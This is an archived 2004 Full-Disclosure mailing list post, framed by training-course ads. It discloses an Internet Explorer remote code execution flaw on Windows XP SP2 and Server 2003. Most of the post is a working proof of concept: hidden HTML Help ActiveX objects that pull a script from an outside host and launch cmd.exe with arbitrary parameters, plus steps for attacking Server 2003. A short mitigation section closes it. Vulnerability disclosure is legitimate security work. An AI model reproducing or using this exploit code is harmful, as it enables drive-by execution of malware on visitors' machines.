Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] Windows (XP SP2) Remote code execution with parameters

from [ShredderSub7 SecExpert] Network Security [Permanent Link]
Subject: [Full-Disclosure] Windows (XP SP2) Remote code execution with parameters
Date: Tue, 28 Dec 2004 00:24:02 +0000 
PoC (called CMDExe): http://www.freewebs.com/shreddersub7/htm.htm
Discussion: http://www.freewebs.com/shreddersub7/expl-discuss.htm

------------------Which systems are vulnerable?--------
Any system running any Microsoft Windows XP edition with Internet Explorer 6 or higher, even with SP2 applied.
Any system running any Microsoft Windows Server 2003 edition with Internet Explorer 6 or higher.

------------------How does this exploit work?-----------
The problem with Internet Explorer is that it doesn't set any restrictions on web pages that request opening a Windows Help file, compiled with HTML Help. Without a restriction, we can (in Internet Explorer) easily command to open any local web page stored on a victim's computer, including web pages that are founded in Windows Help files (with extension .CHM). In this PoC (Proof of Concept, see below for viewing the PoC), the web page "alt_url_enterprise_specific.htm" (that is founded in the Windows Help file "ntshared.chm") will be opened in the HTML Help program "hh.exe".
Since we now opened a web page stored in a Windows Help file (.CHM), it is possible (thanks to the exploit) to execute a HTML Help control (in this case, an ActiveX control) that only fully works in Help files. So in this PoC, we choosed to launch an ActiveX control for HTML Help. Then, this ActiveX control will execute any program we want, in this example that's "cmd.exe".

Thanks to the exploit, it is even possible to add parameters to the executed program (here: cmd.exe), so that you can easily start malware out of "cmd.exe". In this PoC, we added the parameter "/c pause" to the execution code "cmd.exe", and the result is a DOS Prompt with the text "Press any key to continue. . .".

To make it complete, the 2 needed programs (Internet Explorer and HTML Help) will be automatically shutted down after the execution is finished. In this PoC, HTML Help and Internet Explorer will be automatically closed after the execution, without user interaction.

------------------How can you reproduce this PoC?------------------
Create the file "htm.htm" with the following code (please notice that you may want to modify the full path to the file "htm.txt"):
--------------
&lt;html&gt;<head><title>CMDExe - Windows Exploit - Remote code execution with parameters - Proof of Concept</title></head><body>
<br>&lt;OBJECT style="display:none" id="locate" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194"&gt;
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm">
</OBJECT>
<OBJECT style="display:none" id="locator" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" codebase="hhctrl.ocx#Version=5,2,3790,1194">
<PARAM name="Command" value="Related Topics, MENU">
<PARAM name="Button" value="Text:_">
<PARAM name="Window" value="$global_blank">
<PARAM name="Item1" value='command;javascript:execScript("document.write(\"<script language=\\\"javascript\\\" src=\\\"http://www.freewebs.com/shreddersub7/htm.txt\\\"\"+String.fromCharCode(62)+\"</scr\"+\"ipt\"+String.fromCharCode(62))")'>
</OBJECT>
&lt;script&gt;locate.HHClick();setTimeout("locator.HHClick()",100);setTimeout("window.opener=null;window.close()",10000)&lt;/script&gt;</body>&lt;/html&gt;
--------------

Then create the file "htm.txt" (please notice that you may have to change the full path to your specified program, in this case "cmd.exe"):
--------------
document.write("<object id=a classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=shortcut><param name=item1 value=',cmd.exe,/c pause,'></object><object id=b classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11><param name=command value=close></object><script>a.Click\(\);b.Click\(\)</script>");
--------------

If you want to attack Windows Server 2003 systems, you also need to upload the "hhctrl.ocx" file (http://www.freewebs.com/shreddersub7/hhctrl.ocx)

--------------How to avoid this exploit...-------------
Since there are no patches from Microsoft available yet, here are some (temporary?) solutions: Disable Internet Explorer
or disable Active Scripting (HOW?).
OR Use another browser,for example Mozilla FireFox.

More info (like credits, things that are included etc.) about this exploit can be found at http://www.freewebs.com/shreddersub7/expl-discuss.htm

Contact: ShredderSub7_at_hotmail.com

_________________________________________________________________
Onze vernieuwde gezondheidsrubriek al gezien? http://www.msn.be/gezondheid

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  RE: [Full-Disclosure] YEY AGAIN Automatic remote compromise ofInternetExplorer Service Pack 2 XP SP2, Michael Evanchik
Next by Date:  RE: [Full-Disclosure] YEY AGAIN Automatic remotecompromiseofInternetExplorer Service Pack 2 XP SP2, Michael Evanchik
Previous by Thread:  [Full-Disclosure] IE sp2 and Mozilla Firefox DoS., bipin gautam
Next by Thread:  Re: [Full-Disclosure] Windows (XP SP2) Remote code executionwithparameters, morning_wood
Indexes:  [Date] [Thread] [Top] [All Lists]